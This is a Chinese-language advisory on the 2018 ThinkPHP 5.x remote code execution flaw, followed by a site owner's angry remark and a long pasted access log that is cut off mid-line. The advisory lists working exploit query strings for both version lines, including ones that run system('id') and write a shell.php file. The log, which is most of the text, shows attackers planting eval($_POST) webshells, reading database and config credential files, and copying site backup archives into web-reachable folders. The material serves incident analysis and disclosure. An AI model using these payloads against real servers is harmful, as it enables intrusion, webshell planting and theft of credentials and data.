2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。

此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞,其框架安全性可能会在日后遭受更严峻的考验。据不完全统计,目前全球使用ThinkPHP5及其二次开发系统的网站大概12万。

概况

ThinkPHP诞生于2006年,是一个国产开源的PHP开发框架,其借鉴了Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。ThinkPHP可在Windows和Linux等操作系统运行,支持MySql,Sqlite和PostgreSQL等多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。

目前FOFA系统最新数据(一年内数据)显示全球范围内共有 21万个ThinkPHP网站对外开放服务。中国大陆地区使用数量最多,共有113339台,美国第二,共有37011台,中国香港特别行政区第三,共有12262台,新加坡第四,共有3829台。

全球范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)

危害等级

严重

漏洞影响

目前漏洞影响版本号包括:

5.x < 5.1.31

5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响

AdminLTE后台管理系统

layui后台管理系统

thinkcmf

H-ui.admin后台管理系统

tpshop

FsatAdmin

eyoucms

LarryCMS后台管理系统

tpadmin后台管理系统

snake后台管理系统

ThinkSNS

DolphinPHP后台管理系统

WeMall商城系统

CLTPHP

齐博CMS

DSMALL

YFCMF

HisiPHP后台管理系统

Tplay后台管理系统

lyadmin后台管理系统

haoid后台管理系统

场景还原

5.0.x版本

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.1.x版本

s=index/\think\Request/input&filter=phpinfo&data=1s=index/\think\Request/input&filter=system&data=ids=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3Es=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3Es=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

今天刚看到这个问题 赶紧检查下我们自己的服务器 发现被人打包文件了 哪他妈的有这么巧的事

妈蛋 很骚的操作 直接在上面ls 一通 tar 拷贝 cp移动 打包

瞬间千万个草泥马奔腾

172.68.142.86- - [11/Dec/2018:20:36:19+0800]"GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"200275172.68.142.86- - [11/Dec/2018:20:36:19+0800]"GET /?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"200275162.158.58.6- - [12/Dec/2018:14:46:36+0800]"GET /trade/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"20013173.245.48.60- - [12/Dec/2018:15:45:33+0800]"GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C?php%20eval($_POST[%273a%27])?%3E HTTP/1.1"2002173.245.48.60- - [12/Dec/2018:15:46:12+0800]"GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=0x7e HTTP/1.1"2001173.245.48.60- - [12/Dec/2018:15:46:43+0800]"GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C%3Fphp%20eval%28%24_POST%5B%273a%27%5D%29%3B%3F%3E HTTP/1.1"2002172.68.255.53- - [12/Dec/2018:17:24:08+0800]"GET /trade//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"50058918172.68.255.53- - [12/Dec/2018:17:25:19+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"2001139172.68.255.53- - [12/Dec/2018:17:32:43+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"2001139172.68.255.53- - [12/Dec/2018:17:32:50+0800]"GET /trade/%3fs%3d%2findex%2f%5cthink%5capp%2finvokefunction%26function%3dcall_user_func_array%26vars%5b0%5d%3dfile_put_contents%26vars%5b1%5d%5b%5d%3dinfo.php%26vars%5b1%5d%5b%5d%3d%3c%3fphp+eval(%24_POST%5bcmd%5d%3b%3f%3e HTTP/1.1"404372172.68.255.53- - [12/Dec/2018:17:33:46+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1"2002172.68.255.53- - [12/Dec/2018:17:34:38+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1"2002172.68.255.5- - [12/Dec/2018:17:41:31+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"2001199162.158.179.175- - [12/Dec/2018:17:43:57+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"200171162.158.179.175- - [12/Dec/2018:17:44:16+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20uploadold HTTP/1.1"2001288162.158.179.175- - [12/Dec/2018:17:44:26+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1"200172162.158.179.175- - [12/Dec/2018:17:44:46+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1"20049162.158.179.175- - [12/Dec/2018:17:44:56+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1"2002688162.158.178.36- - [12/Dec/2018:17:55:30+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1"20049162.158.178.36- - [12/Dec/2018:17:55:39+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1"200172162.158.178.36- - [12/Dec/2018:17:55:52+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/config.php HTTP/1.1"20045162.158.178.36- - [12/Dec/2018:17:56:00+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/config.php HTTP/1.1"20010130162.158.179.19- - [12/Dec/2018:18:04:31+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back/ HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:04:37+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:04:41+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20root/db_back HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:05:00+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/./root/db_back/ HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:05:09+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/../root/db_back/ HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:05:14+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../root/db_back/ HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:07:13+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1"200136172.68.253.110- - [12/Dec/2018:18:14:41+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/tradexxxll HTTP/1.1"20030172.68.253.110- - [12/Dec/2018:18:14:52+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now HTTP/1.1"20099172.68.253.110- - [12/Dec/2018:18:15:08+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now.tar.gz HTTP/1.1"20083172.68.255.89- - [12/Dec/2018:18:29:56+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/ HTTP/1.1"200171172.68.255.89- - [12/Dec/2018:18:30:12+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"200172162.158.178.180- - [12/Dec/2018:18:33:38+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"200219172.68.255.89- - [12/Dec/2018:18:39:32+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"200273172.68.255.89- - [12/Dec/2018:18:39:45+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430162.158.178.180- - [12/Dec/2018:18:40:58+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430162.158.178.180- - [12/Dec/2018:18:41:01+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430162.158.178.180- - [12/Dec/2018:18:41:03+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430162.158.178.180- - [12/Dec/2018:18:41:06+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430162.158.178.180- - [12/Dec/2018:18:41:08+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430172.68.255.89- - [12/Dec/2018:18:33:23+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/www.xxx.com-now.tar.gz%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"200-108.162.215.85- - [12/Dec/2018:18:45:06+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"50058225172.68.189.100- - [12/Dec/2018:18:45:43+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1"50045106172.68.141.151- - [12/Dec/2018:18:45:43+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"50058302108.162.215.85- - [12/Dec/2018:18:46:25+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=ls&vars[1][]=1 HTTP/1.1"50045262108.162.215.85- - [12/Dec/2018:18:47:09+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(%22ls%22)&vars[1][]=1 HTTP/1.1"50045875108.162.215.85- - [12/Dec/2018:18:47:24+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=exec(ls)&vars[1][]=1 HTTP/1.1"50045335108.162.215.85- - [12/Dec/2018:18:47:37+0800]"GET /trade/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1"40442360108.162.215.85- - [12/Dec/2018:18:48:02+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1"20095108.162.215.85- - [12/Dec/2018:18:50:32+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system()&vars[1][]=id HTTP/1.1"50045345108.162.215.85- - [12/Dec/2018:18:50:38+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=systemls&vars[1][]=id HTTP/1.1"50045344108.162.215.85- - [12/Dec/2018:18:51:25+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=exec(ls)&vars[1][]=id HTTP/1.1"50045345172.68.255.53- - [12/Dec/2018:18:53:53+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430172.68.253.98- - [12/Dec/2018:18:53:55+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430172.68.253.98- - [12/Dec/2018:18:53:57+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430172.68.253.98- - [12/Dec/2018:18:54:08+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430172.68.253.98- - [12/Dec/2018:18:54:14+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"2001430172.68.253.98- - [12/Dec/2018:18:54:32+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/ HTTP/1.1"2001199172.68.253.98- - [12/Dec/2018:18:54:42+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/ HTTP/1.1"200171172.68.253.98- - [12/Dec/2018:18:55:13+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"20019172.68.254.147- - [12/Dec/2018:18:55:21+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"20070162.158.179.19- - [12/Dec/2018:18:55:45+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1"200136162.158.179.19- - [12/Dec/2018:18:56:06+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com HTTP/1.1"20099162.158.179.19- - [12/Dec/2018:18:56:16+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/back-xxx HTTP/1.1"20079172.68.254.111- - [12/Dec/2018:18:56:34+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"20070172.68.253.146- - [12/Dec/2018:18:56:50+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"20070172.68.253.146- - [12/Dec/2018:18:56:59+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200349172.68.253.146- - [12/Dec/2018:18:57:07+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200349172.68.253.146- - [12/Dec/2018:18:57:11+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200349172.68.253.146- - [12/Dec/2018:18:57:46+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200349172.68.253.146- - [12/Dec/2018:18:57:56+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1"200136172.68.253.146- - [12/Dec/2018:18:58:04+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall HTTP/1.1"20091172.68.253.146- - [12/Dec/2018:18:58:24+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall/data HTTP/1.1"20070172.68.253.146- - [12/Dec/2018:18:58:33+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall/data/config HTTP/1.1"20029172.68.253.146- - [12/Dec/2018:18:58:56+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config HTTP/1.1"200-172.68.253.146- - [12/Dec/2018:18:59:06+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1"2002897172.68.253.146- - [12/Dec/2018:18:59:14+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1"2002897172.68.253.146- - [12/Dec/2018:18:59:21+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1"2002688172.68.253.146- - [12/Dec/2018:18:59:50+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20home/website/xxxmall/data/config/config.ini.php HTTP/1.1"200-172.68.253.146- - [12/Dec/2018:18:59:55+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1"2002897172.68.253.146- - [12/Dec/2018:19:00:08+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.253.146- - [12/Dec/2018:19:00:10+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.253.146- - [12/Dec/2018:19:00:12+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:00:58+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:01:00+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:01:11+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:01:13+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:01:15+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:01:18+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:01:20+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:02:07+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/trash HTTP/1.1"20033172.68.255.89- - [12/Dec/2018:19:02:31+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.255.89- - [12/Dec/2018:19:02:41+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"20070172.68.255.89- - [12/Dec/2018:19:02:48+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime/log HTTP/1.1"20013172.68.255.89- - [12/Dec/2018:19:02:57+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime/log/201812 HTTP/1.1"20011273172.68.255.89- - [12/Dec/2018:19:03:48+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.253.98- - [12/Dec/2018:18:55:18+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/www.xxx.com-now.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200-172.68.255.89- - [12/Dec/2018:19:03:55+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.47.93- - [12/Dec/2018:19:09:31+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1"20095172.68.47.93- - [12/Dec/2018:19:09:43+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system()&vars[1][]=id HTTP/1.1"50045343172.68.47.93- - [12/Dec/2018:19:09:56+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(ls)&vars[1][]=id HTTP/1.1"50045367172.68.47.93- - [12/Dec/2018:19:10:02+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1"20095172.68.253.188- - [12/Dec/2018:19:15:11+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.253.188- - [12/Dec/2018:19:15:13+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.211.211- - [12/Dec/2018:19:15:23+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(`ls`)&vars[1][]=id HTTP/1.1"50045393172.69.22.179- - [12/Dec/2018:19:15:31+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1"50044180172.68.141.235- - [12/Dec/2018:19:15:39+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1"50045014172.68.253.188- - [12/Dec/2018:19:15:54+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.211.211- - [12/Dec/2018:19:16:19+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(ping%202%20||%20whoami)&vars[1][]=id HTTP/1.1"50045867172.68.211.211- - [12/Dec/2018:19:16:39+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(ls)&vars[1][]=id HTTP/1.1"50045417172.68.211.211- - [12/Dec/2018:19:16:46+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(`ls`)&vars[1][]=id HTTP/1.1"50045441172.68.211.211- - [12/Dec/2018:19:19:34+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4 HTTP/1.1"200-172.68.211.211- - [12/Dec/2018:19:19:35+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4 HTTP/1.1"200-172.68.211.211- - [12/Dec/2018:19:19:41+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"200171172.68.211.211- - [12/Dec/2018:19:21:29+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"200153172.68.253.110- - [12/Dec/2018:19:21:30+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200-172.68.253.110- - [12/Dec/2018:19:21:40+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.253.110- - [12/Dec/2018:19:22:07+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200-172.68.253.110- - [12/Dec/2018:19:22:11+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"200355172.68.211.211- - [12/Dec/2018:19:24:15+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"40443043172.68.211.211- - [12/Dec/2018:19:24:28+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"40443043162.158.179.19- - [12/Dec/2018:19:24:46+0800]"GET 